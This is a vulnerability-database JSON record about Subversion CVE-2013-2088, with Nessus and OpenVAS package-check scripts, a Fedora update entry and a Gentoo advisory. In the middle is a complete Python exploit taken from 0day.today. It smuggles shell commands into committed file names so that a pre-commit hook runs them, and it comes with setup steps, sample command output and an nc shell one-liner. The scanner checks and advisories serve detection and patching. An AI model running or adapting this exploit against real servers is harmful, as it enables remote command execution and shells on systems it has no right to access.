script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-vcs/subversion\", unaffected:make_list(\"ge 1.7.13\"), vulnerable:make_list(\"lt 1.7.13\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Subversion\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-04-04T17:32:42", "description": "Exploit for linux platform in category remote exploits", "edition": 2, "published": "2016-10-12T00:00:00", "type": "zdt", "title": "Subversion 1.6.6 / 1.6.12 - Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2088"], "modified": "2016-10-12T00:00:00", "id": "1337DAY-ID-25494", "href": "https://0day.today/exploit/description/25494", "sourceData": "# This is an exploit for the subversion vulnerability published as CVE-2013-2088.\r\n \r\n# Author: GlacierZ0ne ([email\u00a0protected])\r\n# Exploit Type: Code Execution\r\n# Access Type: Authenticated Remote Exploit\r\n# Prerequisites: svn command line client available,\r\n# subversion server exposes webdav through apache,\r\n# user/password with commit privilege\r\n \r\n# The exploit has been tested with the following software:\r\n \r\n# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit\r\n# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit\r\n# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit\r\n \r\n# The following conditions need to be met in order for this to work:\r\n \r\n# The pre-commit script svn-keyword-check.pl needs to be configured as\r\n# pre-commit hook. The version shipped with the subversion 1.6.6 contains\r\n# a bug which prevents it from being used at all. This bug must be fixed\r\n# (otherwise neither the exploit, nor the intented purpose of the script\r\n# will work)\r\n# This perl script can be downloaded from the archive source distribution\r\n# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23\r\n# are vulnerable.\r\n \r\n# ###############################################################\r\n \r\n# 1. configure the pre-commit hook to use svn-keyword-check.pl\r\n \r\n# ###############################################################\r\n# Copy the svn-keyword-check.pl from the source distribution to the\r\n# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl\r\n# to pre-commit. Make sure both files are owned by the user running\r\n# apache (e.g. www-data) and have the executable flag set:\r\n#\r\n# [email\u00a0protected]:/$ cd /svn/repositories/testrepo/hooks\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ ls -al\r\n# total 76\r\n# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .\r\n# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..\r\n# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl\r\n# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl\r\n# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl\r\n# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit\r\n# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl\r\n# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ \r\n \r\n# According to the subversion documentation, svn-keyword-check.pl needs\r\n# to be called by pre-commit. svn-keyword-check.pl will return 1 if it\r\n# detects something that should prevent the commit. In that case, the\r\n# subversion server will cancel the commit. Here's how pre-commit looked\r\n# on my test server:\r\n \r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ cat pre-commit\r\n# #!/bin/sh\r\n \r\n# REPOS=\"$1\"\r\n# TXN=\"$2\"\r\n \r\n# # Make sure that the log message contains some text.\r\n# #jSVNLOOK=/usr/bin/svnlook\r\n# $SVNLOOK log -t \"$TXN\" \"$REPOS\" | \\\r\n# ep \"[a-zA-Z0-9]\" > /dev/null || exit 1\r\n# \r\n# # Exit on all errors.\r\n# set -e\r\n# \r\n# # Check the files that are are listed in \"svnlook changed\" (except deleted\r\n# # files) for possible problems with svn:keywords set on binary files.\r\n# \"$REPOS\"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN\r\n# #\r\n# #\r\n# #\r\n# \r\n# # All checks passed, so allow the commit.\r\n# exit 0\r\n# \r\n# ###############################################################\r\n# \r\n# 2. fix the bug in svn-keyword-check.pl\r\n# \r\n# ###############################################################\r\n# The script pre-commit will pass on repository and transaction to\r\n# the script svn-keyword-check.pl. Alternatively, it also accepts\r\n# repository and revision. However, specifying both transaction\r\n# and revision is illegal, only one of them is considered legal.\r\n# This reflects in the input parameter plausibility check\r\n# performed in line 89:\r\n# \r\n# if (defined($transaction) and !defined($revision)) {\r\n# croak \"Can't define both revision and transaction!\\n\";\r\n# }\r\n# \r\n# Unfortunately, there is an exclamation mark too much. It must\r\n# be\r\n# \r\n# if (defined($transaction) and defined($revision)) {\r\n# croak \"Can't define both revision and transaction!\\n\";\r\n# }\r\n# \r\n# The way this script is shipped in the 1.6.6 source distribution\r\n# no commit is possible at all.\r\n# \r\n# Before using the exploit you should first commit one file\r\n# manually so that the svn client can store your user/password\r\n# locally.\r\n# \r\n# Then, open a shell and navigate to the directory of your project\r\n# and start python cve-2013-2088-1.py <command>:\r\n#\r\n# [email\u00a0protected]:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig\r\n# [+] Randfilename is mJHeSkya\r\n# [+] Created random file\r\n# [+] Submitted random file to version control\r\n# [+] Created fake file for cmd execution\r\n# [+] Exploit seems to work: \r\n#\r\n# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a \r\n# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0\r\n# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link\r\n# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0\r\n# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0\r\n# collisions:0 txqueuelen:1000 \r\n# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)\r\n#\r\n# lo Link encap:Local Loopback \r\n# inet addr:127.0.0.1 Mask:255.0.0.0\r\n# inet6 addr: ::1/128 Scope:Host\r\n# UP LOOPBACK RUNNING MTU:16436 Metric:1\r\n# RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n# collisions:0 txqueuelen:0 \r\n# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n#\r\n# [email\u00a0protected]:~/eworkspace/kais_1_project$ python svn_exploit2.py id\r\n# [+] Randfilename is WmolHiuv\r\n# [+] Created random file\r\n# [+] Submitted random file to version control\r\n# [+] Created fake file for cmd execution\r\n# [+] Exploit seems to work: \r\n#\r\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n#\r\n#\r\n# Important things to notice\r\n \r\n# * For each command execution the exploit will put a file under\r\n# version control. If you submit a lot of commands you will\r\n# create a lot of files with random 8 alphanumeric character\r\n# file names in your repository.\r\n# * Your command must not contain a / since file names must not\r\n# contain a /. In the author's test environment the current\r\n# working directory of apache was the root folder /.\r\n# Therefore, the exploit will replace / in the command with\r\n# $(pwd). This worked fine for the author.\r\n# In your environment this might be different. As first thing\r\n# execute $(pwd) in order to check if this works for you, too.\r\n# * The command execution assumes that your command prints something\r\n# to the terminal and exits. If you know your command will not\r\n# immediately terminate (e.g. because you're starting a reverse/\r\n# bind shell), provide the -d or --dont-terminate flag:\r\n# python svn_exploit2.py -d \"/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe\"\r\n#\r\n#\r\n#\r\nimport sys\r\nimport subprocess\r\nimport argparse\r\nimport random\r\nimport os\r\n \r\nif __name__ == \"__main__\":\r\n \r\n lowerupper = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n slash_replacement = \"$(pwd)\" \r\n cwd = os.getcwd()\r\n \r\n parser = argparse.ArgumentParser (usage=\"python {} [options] command\".format (sys.argv [0]),\r\n epilog=\"\\x0a\\x0a\")\r\n \r\n parser.add_argument (dest=\"command\", help=\"Command to execute\")\r\n parser.add_argument (\"-d\", \"--dont-terminate\", help=\"don't force output be sent back to the client. Useful for reverse shell connections.\",\r\n action=\"store_true\")\r\n \r\n #\r\n # args handling\r\n #\r\n if (len(sys.argv) <= 1):\r\n parser.print_help ()\r\n sys.exit (0)\r\n \r\n args = parser.parse_args ()\r\n if not args.command:\r\n parser.print_help ()\r\n sys.exit (0)\r\n \r\n #\r\n # / cannot be used in the command because svn will interprete it as\r\n # file separator. Therefore you have to use a workaround. Here,\r\n # $(pwd) works great for us.\r\n #\r\n command = args.command\r\n if command.find (\"/\") != -1:\r\n command = command.replace(\"/\", slash_replacement)\r\n \r\n #\r\n # prepare output files for stdout, stderr\r\n #\r\n sout = open (\"stdout\", \"w+\")\r\n serr = open (\"stderr\", \"w+\")\r\n \r\n randfilename = \"\"\r\n for idx in range (0, 8):\r\n randfilename = randfilename + lowerupper [random.randint (0,51)]\r\n \r\n print (\"[+] Randfilename is {}\".format(randfilename))\r\n \r\n f = open (randfilename, \"w+\")\r\n f.write (\"You've been pwned by GlacierZ0ne'\") # write 4\r\n f.flush ()\r\n f.close ()\r\n \r\n p = subprocess.Popen ([\"svn\", \"add\", \"./{randfilename}\".format (randfilename=randfilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Create random file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Created random file\")\r\n \r\n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"./{randfilename}\".format (randfilename=randfilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Submission of random file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Submitted random file to version control\")\r\n \r\n fakefilename = None\r\n if args.dont_terminate == True:\r\n fakefilename = \"{}; {}\".format (randfilename, command)\r\n else:\r\n fakefilename = \"{}; {} 1>&2; exit 1\".format (randfilename, command)\r\n f = open (fakefilename, \"w+\")\r\n f.write (\"You've been pwned by GlacierZ0ne\") # write 4\r\n f.flush ()\r\n f.close ()\r\n \r\n p = subprocess.Popen ([\"svn\", \"add\", \"{fakefilename}\"\r\n .format (cwd=cwd, fakefilename=fakefilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Creation of fake file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Created fake file for cmd execution\")\r\n \r\n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"{fakefilename}\"\r\n .format (cwd=cwd, fakefilename=fakefilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) == 0:\r\n if not args.dont_terminate:\r\n print \"[-] Something went wrong, pre-commit hook didn't kick in.\"\r\n else:\r\n print \"[!] Done\"\r\n sys.exit (0)\r\n else:\r\n idx0= c[1].find (\"Commit blocked by pre-commit hook\")\r\n idx = c[1].find (\"failed with this output\")\r\n \r\n if idx0 != -1 and idx != -1:\r\n print (\"[+] Exploit seems to work: \")\r\n print (c[1][idx + len(\"failed with this output\") + 1:])\r\n \r\n sout.flush ()\r\n sout.close ()\r\n serr.flush ()\r\n serr.close ()\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25494"}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1968", "CVE-2013-2088", "CVE-2013-2112", "CVE-2013-4131"], "description": "Subversion is a concurrent version control system which enables one or more users to collaborate in developing and maintaining a hierarchy of files and directories while keeping a history of all changes. Subversion only stores the differences between versions, instead of every complete file. Subversion is intended to be a compelling replacement for CVS. ", "modified": "2013-08-15T02:33:32", "published": "2013-08-15T02:33:32", "id": "FEDORA:0B49E21353", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: subversion-1.7.11-1.fc18.1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2018-01-26T11:10:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "Check for the Version of subversion", "modified": "2018-01-26T00:00:00", "published": "2013-08-16T00:00:00", "id": "OPENVAS:866461", "href": "http://plugins.openvas.org/nasl.php?oid=866461", "type": "openvas", "title": "Fedora Update for subversion FEDORA-2013-13672", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for subversion FEDORA-2013-13672\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866461);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-16 08:59:27 +0530 (Fri, 16 Aug 2013)\");\n script_cve_id(\"CVE-2013-4131\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for subversion FEDORA-2013-13672\");\n\n tag_insight = \"Subversion is a concurrent version control system which enables one\nor more users to collaborate in developing and maintaining a\nhierarchy of files and directories while keeping a history of all\nchanges. Subversion only stores the differences between versions,\ninstead of every complete file. Subversion is intended to be a\ncompelling replacement for CVS.\n\";\n\n tag_affected = \"subversion on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-13672\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113943.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of subversion\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"subversion\", rpm:\"subversion~1.7.11~1.fc18.1\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-08-16T00:00:00", "id": "OPENVAS:1361412562310866461", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866461", "type": "openvas", "title": "Fedora Update for subversion FEDORA-2013-13672", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for subversion FEDORA-2013-13672\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866461\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-16 08:59:27 +0530 (Fri, 16 Aug 2013)\");\n script_cve_id(\"CVE-2013-4131\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for subversion FEDORA-2013-13672\");\n\n\n script_tag(name:\"affected\", value:\"subversion on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-13672\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113943.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'subversion'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"subversion\", rpm:\"subversion~1.7.11~1.fc18.1\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4644", "CVE-2010-4539", "CVE-2011-1783", "CVE-2013-4277", "CVE-2013-1884", "CVE-2011-1752", "CVE-2013-1849", "CVE-2013-1845", "CVE-2013-1846", "CVE-2011-1921", "CVE-2011-0715", "CVE-2013-1847", "CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "Gentoo Linux Local Security Checks GLSA 201309-11", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121025", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201309-11", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201309-11.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121025\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201309-11\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Subversion. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201309-11\");\n script_cve_id(\"CVE-2010-4539\", \"CVE-2010-4644\", \"CVE-2011-0715\", \"CVE-2011-1752\", \"CVE-2011-1783\", \"CVE-2011-1921\", \"CVE-2013-1845\", \"CVE-2013-1846\", \"CVE-2013-1847\", \"CVE-2013-1849\", \"CVE-2013-1884\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\", \"CVE-2013-4131\", \"CVE-2013-4277\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201309-11\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-vcs/subversion\", unaffected: make_list(\"ge 1.7.13\"), vulnerable: make_list(\"lt 1.7.13\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:07", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4644", "CVE-2010-4539", "CVE-2011-1783", "CVE-2013-4277", "CVE-2013-1884", "CVE-2011-1752", "CVE-2013-1849", "CVE-2013-1845", "CVE-2013-1846", "CVE-2011-1921", "CVE-2011-0715", "CVE-2013-1847", "CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "### Background\n\nSubversion is a versioning system designed to be a replacement for CVS. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Subversion. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could cause a Denial of Service condition or obtain sensitive information. A local attacker could escalate his privileges to the user running svnserve. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Subversion users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/subversion-1.7.13\"", "edition": 1, "modified": "2013-09-23T00:00:00", "published": "2013-09-23T00:00:00", "id": "GLSA-201309-11", "href": "https://security.gentoo.org/glsa/201309-11", "type": "gentoo", "title": "Subversion: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}
